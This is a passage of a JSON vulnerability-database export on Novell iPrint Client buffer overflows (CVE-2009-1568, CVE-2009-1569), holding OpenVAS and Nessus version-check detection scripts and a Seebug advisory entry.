\"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\niPrintVer = get_kb_item(\"Novell/iPrint/Client/Linux/Ver\");\nif(iPrintVer == NULL){\n exit(0);\n}\n\nif(version_is_less(version:iPrintVer, test_version:\"5.32\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:1361412562310900728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900728", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900728\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Client/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation lets the remote attacker have a control over\n the remote system registers allowing execution of malformed shellcode.\");\n script_tag(name:\"affected\", value:\"Novell iPrint Client version prior to 5.32\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\");\n script_tag(name:\"solution\", value:\"Upgrade Novell iPrint Client version to 5.32.\");\n script_tag(name:\"summary\", value:\"This host is installed with Novell iPrint Client and is prone to\n multiple Buffer Overflow vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37169\");\n script_xref(name:\"URL\", value:\"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name:\"URL\", value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\niPrintVer = get_kb_item(\"Novell/iPrint/Client/Linux/Ver\");\nif(!iPrintVer)\n exit(0);\n\nif(version_is_less(version:iPrintVer, test_version:\"5.32\")){\n report = report_fixed_ver(installed_version:iPrintVer, fixed_version:\"5.32\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:1361412562310900729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900729", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:novell:iprint\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900729\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37169\");\n script_xref(name:\"URL\", value:\"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name:\"URL\", value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation lets the remote attacker have a control over the remote\n system registers allowing execution of malformed shellcode.\");\n\n script_tag(name:\"affected\", value:\"Novell iPrint Client version prior to 5.32.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application context.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Novell iPrint Client version to 5.32.\");\n\n script_tag(name:\"summary\", value:\"This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"5.32\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.32\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-21T11:44:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "description": "This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.", "modified": "2017-12-20T00:00:00", "published": "2009-12-21T00:00:00", "id": "OPENVAS:900729", "href": "http://plugins.openvas.org/nasl.php?oid=900729", "type": "openvas", "title": "Novell iPrint Client Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_novell_iprint_client_mult_bof_vuln_win.nasl 8201 2017-12-20 14:28:50Z cfischer $\n#\n# Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:novell:iprint\";\n\ntag_impact = \"Successful exploitation lets the remote attacker have a control over the remote\n system registers allowing execution of malformed shellcode.\n\n Impact Level: System\";\ntag_affected = \"Novell iPrint Client version prior to 5.32\";\ntag_insight = \"Multiple flaws are due to inadequate boundary checks on user supplied\n inputs while the application processes the input data into the application\n context.\";\ntag_solution = \"Upgrade Novell iPrint Client version to 5.32\n http://download.novell.com\";\ntag_summary = \"This host is running Novell iPrint Client and is prone to multiple\n Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900729);\n script_version(\"$Revision: 8201 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 15:28:50 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-21 07:14:17 +0100 (Mon, 21 Dec 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1569\", \"CVE-2009-1568\");\n script_bugtraq_id(37242);\n script_name(\"Novell iPrint Client Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37169\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2009-40/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3429\");\n script_xref(name : \"URL\" , value : \"http://download.novell.com/Download?buildid=29T3EFRky18~\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/archive/1/508288/100/0/threaded\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_novell_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Novell/iPrint/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"5.32\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.32\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:26:20", "description": "BUGTRAQ ID: 37242\r\nCVE ID: CVE-2009-1568,CVE-2009-1569\r\n\r\nNovell iPrint\u6253\u5370\u89e3\u51b3\u65b9\u6848\u5141\u8bb8\u7528\u6237\u5411\u7f51\u7edc\u6253\u5370\u673a\u53d1\u9001\u6587\u6863\u3002\r\n\r\niPrint\u5ba2\u6237\u7aef\u7684ienipp.ocx\u5728\u89e3\u6790target-frame\u53c2\u6570\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u67d0\u4e9b\u65b9\u6cd5\u5728\u89e3\u6790\u65f6\u95f4\u4fe1\u606f\u65f6\u5b58\u5728\u53e6\u4e00\u4e2a\u6808\u6ea2\u51fa\u3002\u7528\u6237\u53d7\u9a97\u67e5\u770b\u4e86\u6076\u610f\u7f51\u9875\u5c31\u53ef\u80fd\u89e6\u53d1\u8fd9\u4e9b\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nNovell iPrint Client 5.30\r\nNovell iPrint Client 4.38\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nNovell\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://download.novell.com/Download?buildid=29T3EFRky18~", "published": "2009-12-14T00:00:00", "type": "seebug", "title": "Novell iPrint\u5ba2\u6237\u7aef\u591a\u4e2a\u6808\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "modified": "2009-12-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15060", "id": "SSV:15060", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T04:20:12", "description": "The remote host has Novell iPrint Client installed.\n\nThe installed version of Novell iPrint Client is affected by multiple\nbuffer overflow vulnerabilities :\n\n - A stack-based buffer overflow exists due to insufficient\n boundary checks on the 'target-frame' parameter.\n (CVE-2009-1568)\n\n - A stack-based buffer overflow exists due to insufficient\n validation of time information. (CVE-2009-1569)", "edition": 28, "published": "2009-12-08T00:00:00", "title": "Novell iPrint Client < 5.32 Multiple Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1568", "CVE-2009-1569"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:novell:iprint"], "id": "NOVELL_IPRINT_532.NASL", "href": "https://www.tenable.com/plugins/nessus/43060", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43060);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2009-1568\",\"CVE-2009-1569\");\n script_bugtraq_id(37242);\n script_xref(name:\"Secunia\", value:\"35004\");\n script_xref(name:\"Secunia\", value:\"37169\");\n\n script_name(english:\"Novell iPrint Client < 5.32 Multiple Overflows\");\n script_summary(english:\"Checks version of Novell iPrint Client\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains an application that is affected by multiple\nbuffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has Novell iPrint Client installed.\n\nThe installed version of Novell iPrint Client is affected by multiple\nbuffer overflow vulnerabilities :\n\n - A stack-based buffer overflow exists due to insufficient\n boundary checks on the 'target-frame' parameter.\n (CVE-2009-1568)\n\n - A stack-based buffer overflow exists due to insufficient\n validation of time information. (CVE-2009-1569)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2009-40\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2009-44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2009/Dec/174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/fulldisclosure/2009/Dec/175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.novell.com/Download?buildid=29T3EFRky18~\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Novell iPrint Client 5.32 or later.\n\nNote: There is no fix available for Novell iPrint Client 4.x branch.\nUsers should consider upgrading to 5.32\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell iPrint Client ActiveX Control Date/Time Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:iprint\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(1,\"The 'SMB/Registry/Enumerated' KB item is not set to TRUE.\");\n\nwinroot = hotfix_get_systemroot();\nif (!winroot) exit(1, \"The 'SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/SystemRoot' KB item is missing.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:winroot);\ndll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\System32\\nipplib.dll\", string:winroot);\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL,share);\n}\n\nfh = CreateFile(file:dll,\n\tdesired_access:GENERIC_READ,\n\tfile_attributes:FILE_ATTRIBUTE_NORMAL,\n\tshare_mode:FILE_SHARE_READ,\n\tcreate_disposition:OPEN_EXISTING);\n\nif (isnull(fh))\n{\n NetUseDel();\n exit(0, \"The file '\"+winroot+\"\\System32\\nipplib.dll' does not exist.\");\n}\n\nver = GetFileVersion(handle:fh);\nCloseFile(handle:fh);\nNetUseDel();\n\n# Check the version number.\nif (!isnull(ver))\n{\n version_ui = ver[0] + \".\" + ver[1] + ver[2];\n\n # Save the info for other plugins.\n set_kb_item(name:\"SMB/Novell/iPrint/DLL\", value:winroot + \"\\System32\\nipplib.dll\");\n set_kb_item(name:\"SMB/Novell/iPrint/Version\", value:join(ver, sep:\".\"));\n set_kb_item(name:\"SMB/Novell/iPrint/Version_UI\", value:version_ui);\n\n # Version that is not vulnerable.\n fixed_version_ui = \"5.32\";\n fix = split(\"5.3.2.0\", sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(ver); i++)\n if ((ver[i] < fix[i]))\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n' +\n \"File : \" + winroot + \"\\System32\\nipplib.dll\" + '\\n' +\n \"Installed version : \" + version_ui + '\\n' +\n \"Fixed version : \" + fixed_version_ui + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n else if (ver[i] > fix[i])\n break;\n\n exit(0, \"The host is not affected since Novell iPrint Client \"+version_ui+\" is installed.\");\n}\nelse exit(1, \"Can't get file version of 'nipplib.dll'.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
